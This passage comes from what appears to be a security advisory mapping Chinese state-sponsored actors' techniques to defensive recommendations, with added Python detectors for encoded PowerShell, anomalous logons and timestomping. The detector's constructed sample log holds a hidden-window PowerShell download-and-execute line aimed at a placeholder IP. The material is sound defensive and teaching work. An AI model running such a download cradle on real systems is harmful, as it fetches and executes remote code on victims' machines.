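ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A hidden console window is rarely used by interactive administrators.
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.IGNORECASE)
CMDLINE = re.compile(r"\bcmdline=(.*)$")
HOST = re.compile(r"\bhost=(\S+)")


@dataclass
class Finding:
    host: str
    decoded: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell encodes the script as UTF-16LE, then Base64. Return None if that fails."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding for an encoded PowerShell invocation, or None for other records."""
    cmd_match = CMDLINE.search(line)
    if not cmd_match:
        return None
    cmdline = cmd_match.group(1)
    enc = ENCODED_FLAG.search(cmdline)
    if not enc:
        return None  # plain command lines are left to other rules
    host_match = HOST.search(line)
    finding = Finding(host=host_match.group(1) if host_match else "?",
                      decoded=decode_encoded_command(enc.group(1)))
    if finding.decoded is None:
        finding.reasons.append("encoded command did not decode as Base64/UTF-16LE")
        return finding
    lowered = finding.decoded.lower()
    hits = [t for t in SUSPICIOUS_TOKENS if re.search(r"\b" + re.escape(t) + r"\b", lowered)]
    if hits:
        finding.reasons.append("decoded script contains " + ", ".join(hits))
    if HIDDEN_WINDOW.search(cmdline):
        finding.reasons.append("launched with a hidden window")
    return finding


def analyze(lines: List[str]) -> List[Finding]:
    return [f for f in map(analyze_line, lines) if f is not None]


def encode_for_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects; used only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records, not real telemetry.
SAMPLE_LOG = [
    "2021-07-19T02:14:05Z host=WS01 user=adm.jdoe cmdline=powershell.exe -NoProfile -EncodedCommand "
    + encode_for_powershell("Get-ChildItem C:\\Users | Measure-Object"),
    "2021-07-19T02:14:09Z host=WS01 user=adm.jdoe cmdline=cmd.exe /c whoami",
    "2021-07-19T02:15:31Z host=WS07 user=rsmith cmdline=powershell.exe -w hidden -nop -enc "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"),
    "2021-07-19T02:16:02Z host=WS07 user=rsmith cmdline=powershell.exe -enc AAA",  # not valid Base64
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.host}: {'SUSPICIOUS' if f.suspicious else 'ok'} {f.reasons} decoded={f.decoded!r}")
```

An encoded command that does not decode is reported rather than dropped, since a record the rule cannot read is itself worth a look; the benign encoded inventory command on WS01 decodes cleanly and is not flagged, which is the false-positive case a SIEM rule has to survive.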

Python

 * Audit inventory systems for unauthorized Python installations.
 * Blocklist Python where not required.
 * Prevent users from installing Python where not required.

JavaScript

 * Turn off or restrict access to unneeded scripting components.
 * Blocklist scripting where appropriate.
 * For malicious code served up through ads, adblockers can help prevent that code from executing.

Network Device Command Line Interface (CLI)

 * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.
 * Use an authentication, authorization, and accounting (AAA) system to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.
 * Ensure least privilege principles are applied to user accounts and groups.

|

Harden:

 * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]

Detect:

 * Process Analysis
   * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Scheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]

 * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]
 * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]
|

Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtasks` or `crontab`, to create and schedule tasks that enumerate victim devices and networks.

**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

|

 * Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
 * Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in `%systemroot%\System32\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command line utilities, such as PowerShell or Windows Management Instrumentation (WMI), that do not conform to typical administrator or user actions.

|

Detect:

 * Platform Monitoring
   * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)]
     * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]
     * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]
     * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]

 * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
 * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]
|

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

|

 * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
 * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
 * Use a domain reputation service to detect and block suspicious or malicious domains.
 * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
 * Ensure all browsers and plugins are kept up to date.
 * Use modern browsers with security features turned on.
 * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.
|

Detect:

 * File Analysis
   * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
   * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
 * Identifier Analysis
   * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
   * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
 * Network Traffic Analysis
   * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
 * Network Isolation
   * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
   * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]

_Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]:

 * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]
|

Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

|

 * Disallow loading of remote DLLs.
 * Enable safe DLL search mode.
 * Implement tools for detecting search order hijacking opportunities.
 * Use application allowlisting to block unknown DLLs.
 * Monitor the file system for created, moved, and renamed DLLs.
 * Monitor for changes in system DLLs not associated with updates or patches.
 * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).
|

Detect:

 * Platform Monitoring
   * Operating System Monitoring
     * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]

 * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]
|

Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].

|

 * Monitor for policy changes to authentication mechanisms used by the domain controller.
 * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
 * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
 * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
 * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
 * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer.
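The bullets above spell out three account-behavior rules worth automating: one account logged into multiple systems at once, multiple accounts logged into the same machine at once, and logons at odd hours. As an added example that is not part of the advisory, the following sliding-window checks implement those rules over constructed logon events in a hypothetical `timestamp,user,host` form (what a SIEM export of successful logon events might be reduced to). The window size, the thresholds, and the business-hours range are assumptions to be tuned against an environment's own baseline.

```python
"""Flag the logon patterns the advisory calls out: one account active on many
hosts at once, many accounts on one host at once, and logons outside business
hours. Runs over constructed 'timestamp,user,host' lines (hypothetical format)."""
from collections import defaultdict
from datetime import datetime, time, timedelta
from typing import Callable, List, NamedTuple, Tuple


class Logon(NamedTuple):
    when: datetime
    user: str
    host: str


# Thresholds are assumptions for this example; tune them to the environment's baseline.
WINDOW = timedelta(minutes=10)
MAX_HOSTS_PER_USER = 3
MAX_USERS_PER_HOST = 3
BUSINESS_START, BUSINESS_END = time(7, 0), time(19, 0)


def parse_events(lines: List[str]) -> List[Logon]:
    """Parse 'ISO-timestamp,user,host' lines into chronologically sorted events."""
    events = []
    for line in lines:
        ts, user, host = (part.strip() for part in line.split(","))
        events.append(Logon(datetime.fromisoformat(ts), user, host))
    return sorted(events, key=lambda e: e.when)


def _fan_out(events: List[Logon], group_by: Callable[[Logon], str],
             count: Callable[[Logon], str], limit: int) -> List[Tuple[str, List[str], datetime]]:
    """Sliding window per group: alert when more than `limit` distinct `count` values
    appear within WINDOW. Returns (group, distinct values, time of first breach)."""
    groups = defaultdict(list)
    for e in events:
        groups[group_by(e)].append(e)
    alerts = []
    for key, evs in groups.items():
        start = 0
        for end, e in enumerate(evs):
            while e.when - evs[start].when > WINDOW:
                start += 1
            distinct = {count(x) for x in evs[start:end + 1]}
            if len(distinct) > limit:
                alerts.append((key, sorted(distinct), e.when))
                break  # one alert per group is enough for triage
    return alerts


def account_on_many_hosts(events: List[Logon]):
    """One account logged into more than MAX_HOSTS_PER_USER hosts within WINDOW."""
    return _fan_out(events, lambda e: e.user, lambda e: e.host, MAX_HOSTS_PER_USER)


def many_accounts_on_host(events: List[Logon]):
    """More than MAX_USERS_PER_HOST distinct accounts on one host within WINDOW."""
    return _fan_out(events, lambda e: e.host, lambda e: e.user, MAX_USERS_PER_HOST)


def off_hours_logons(events: List[Logon]) -> List[Logon]:
    """Weekend logons, or logons outside BUSINESS_START..BUSINESS_END."""
    return [e for e in events
            if e.when.weekday() >= 5 or not (BUSINESS_START <= e.when.time() < BUSINESS_END)]


# Constructed sample events (2021-07-20 is a Tuesday); not real logon data.
SAMPLE_EVENTS = [
    "2021-07-20T09:02:00,jdoe,WS01",
    "2021-07-20T09:05:00,jdoe,WS01",
    "2021-07-20T13:10:00,asmith,WS02",
    "2021-07-20T14:00:00,svc_backup,FS01",   # service account fans out across hosts
    "2021-07-20T14:01:00,svc_backup,FS02",
    "2021-07-20T14:02:00,svc_backup,DC01",
    "2021-07-20T14:03:00,svc_backup,WS09",
    "2021-07-20T14:04:00,svc_backup,OWA01",
    "2021-07-20T14:05:00,asmith,WS09",       # four different accounts converge on WS09
    "2021-07-20T14:06:00,bchen,WS09",
    "2021-07-20T14:07:00,jdoe,WS09",
    "2021-07-21T02:41:00,jdoe,OWA01",        # 02:41 logon to the webmail server
]

if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("account on many hosts:", account_on_many_hosts(events))
    print("many accounts on one host:", many_accounts_on_host(events))
    print("off-hours:", off_hours_logons(events))
```

Each rule reports once per account or host, at the moment the threshold is first crossed, which keeps the output to one triage item per incident rather than one per subsequent logon; the service account in the sample trips the first rule even though each individual logon looks routine.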
 * Monitor for and correlate changes to Registry entries.
|

Detect:

 * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
 * User Behavior Analysis
   * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
   * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]

Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]:

 * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]

|

Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.

|

 * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
 * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
 * Perform integrity checks on critical servers to identify and investigate unexpected changes.
 * Have application developers sign their code using digital signatures to verify their identity.
 * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
 * Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
 * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
 * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
 * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
 * Establish, and back up offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
 * Employ user input validation to restrict exploitation of vulnerabilities.
 * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
 * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.
|

Detect:

 * Network Traffic Analysis
   * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
   * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
 * Process Analysis
   * Process Spawn Analysis
     * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

Isolate:

 * Network Isolation
   * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:

 * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]

|

Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.

**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].

|

 * Only allow authorized administrators to make service changes and modify service configurations.
 * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
 * Monitor WMI and PowerShell for service modifications.
|

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]

_Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Domain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]

 * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]

|

Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

|

 * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
 * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
 * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.
|

Detect:

 * Network Traffic Analysis
   * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]
 * Platform Monitoring
   * Operating System Monitoring
     * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]

Process Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]:

 * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]
 * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]
|

Chinese state-sponsored cyber actors have been observed:

 * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.
 * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`).

**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].

|

 * Use endpoint protection software to block process injection based on behavior of the injection process.
 * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
 * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
 * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.
|

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]

### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]

_Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations_

Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---

Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]

|

Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.

|

 * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
 * Consider blocking, disabling, or monitoring use of 7-Zip.
|

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]

Hide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]

|

Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.

|

 * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
 * Monitor event and authentication logs for records of hidden artifacts being used.
 * Monitor the file system and shell commands for hidden attribute usage.
|

Detect:

 * Process Analysis
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]

Isolate:

 * Execution Isolation
   * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]

Indicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]

|

Chinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. Several of the files that the cyber actors target would be timestomped, in order to show different times compared to when those files were actually created or used.

|

 * Make the environment variables associated with command history read only to ensure that the history is preserved.
 * Recognize timestomping by monitoring the contents of important directories and the attributes of the files.
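Timestomping, as the bullet above says, is recognized from file attributes. The following added example (not part of the advisory, and not a particular forensic tool's logic) applies the standard NTFS consistency checks to constructed MFT export records: `$STANDARD_INFORMATION` timestamps that predate the `$FILE_NAME` ones, and `$SI` values with a zeroed sub-second part while `$FN` retains precision. The record layout, the sample paths and the sample timestamps are assumptions.

```python
"""Triage NTFS timestamp inconsistencies that suggest timestomping, using the two
timestamp sets an MFT export provides: $STANDARD_INFORMATION ($SI), which user-mode
tools can rewrite, and $FILE_NAME ($FN), which they cannot set through the normal
file API. Records below are constructed, in a hypothetical export layout truncated
to microseconds (NTFS itself keeps 100 ns resolution)."""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List


@dataclass
class MftRecord:
    path: str
    si_created: datetime
    si_modified: datetime
    fn_created: datetime
    fn_modified: datetime


def timestomp_indicators(rec: MftRecord) -> List[str]:
    """Return human-readable reasons this record looks backdated (empty list = no indicator)."""
    reasons = []
    # 1. $SI earlier than $FN. A SetFileTime-style change only rewrites $SI, so a creation
    #    time that predates the kernel-maintained $FN creation is the classic sign.
    #    Benign cause to rule out before escalating: a move or rename within a volume,
    #    which can refresh $FN.
    if rec.si_created < rec.fn_created:
        reasons.append("$SI creation predates $FN creation")
    if rec.si_modified < rec.fn_modified:
        reasons.append("$SI modification predates $FN modification")
    # 2. Zeroed sub-second component. Timestamps set from a human-typed value usually
    #    leave the fraction at zero, while the real $FN values keep their precision.
    if (rec.si_created.microsecond == 0 and rec.si_modified.microsecond == 0
            and (rec.fn_created.microsecond or rec.fn_modified.microsecond)):
        reasons.append("$SI timestamps have no sub-second component while $FN does")
    return reasons


def triage(records: List[MftRecord]) -> Dict[str, List[str]]:
    """Map each flagged path to its indicators; paths with no indicators are omitted."""
    flagged = {}
    for rec in records:
        reasons = timestomp_indicators(rec)
        if reasons:
            flagged[rec.path] = reasons
    return flagged


# Constructed records, not from a real system.
SAMPLE_RECORDS = [
    # Ordinary file: $SI and $FN creation agree, content was modified later.
    MftRecord(r"C:\inetpub\wwwroot\index.aspx",
              si_created=datetime(2021, 3, 2, 10, 15, 22, 431200),
              si_modified=datetime(2021, 6, 11, 8, 0, 1, 113000),
              fn_created=datetime(2021, 3, 2, 10, 15, 22, 431200),
              fn_modified=datetime(2021, 3, 2, 10, 15, 22, 431200)),
    # Backdated file: $SI set to a round 2012 value, $FN shows it appeared in July 2021.
    MftRecord(r"C:\inetpub\wwwroot\images\help.aspx",
              si_created=datetime(2012, 7, 13, 12, 0, 0, 0),
              si_modified=datetime(2012, 7, 13, 12, 0, 0, 0),
              fn_created=datetime(2021, 7, 19, 2, 17, 45, 887312),
              fn_modified=datetime(2021, 7, 19, 2, 17, 45, 887312)),
    # File moved into C:\Data in 2021: one indicator only, the benign case to verify.
    MftRecord(r"C:\Data\report.docx",
              si_created=datetime(2020, 1, 5, 9, 0, 0, 250000),
              si_modified=datetime(2021, 2, 1, 16, 30, 12, 900000),
              fn_created=datetime(2021, 2, 1, 16, 30, 12, 900000),
              fn_modified=datetime(2021, 2, 1, 16, 30, 12, 900000)),
]

if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_RECORDS).items():
        print(path)
        for reason in reasons:
            print("   -", reason)
```

The number of indicators is a useful triage weight: the backdated web-root file trips all three, while the moved document trips only the creation-order check, which is the one with a known benign explanation.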
\n * Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.\n * Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.\n * Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]\n\n| \n\nChinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.\n\n| \n\nConsider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.\n\n| \n\nDetect:\n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nSigned Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]\n\n * `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]\n\n * `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]\n\n| \n\nChinese state-sponsored cyber actors were observed 
using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.\n\n| \n\nMonitor processes for the execution of known proxy binaries (e.g., `rundll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.\n\n| \n\nDetect:\n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]\n\n_Table VIII: Chinese state-sponsored cyber actors\u2019 Credential Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.\n\n| \n\n * Update and patch software regularly.\n\n * Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.\n\n| \n\nHarden: \n\n * Platform Hardening\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)] \n \nOS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)] \n\u2022 LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)] 
\n\u2022 NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]\n\n| \n\nChinese state-sponsored cyber actors were observed targeting the LSASS process or Active Directory (`NTDS.DIT`) for credential dumping.\n\n| \n\n * Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NTDS.DIT`.\n\n * Ensure that local administrator accounts have complex, unique passwords across all systems on the network.\n\n * Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and has hardware and firmware system requirements. 
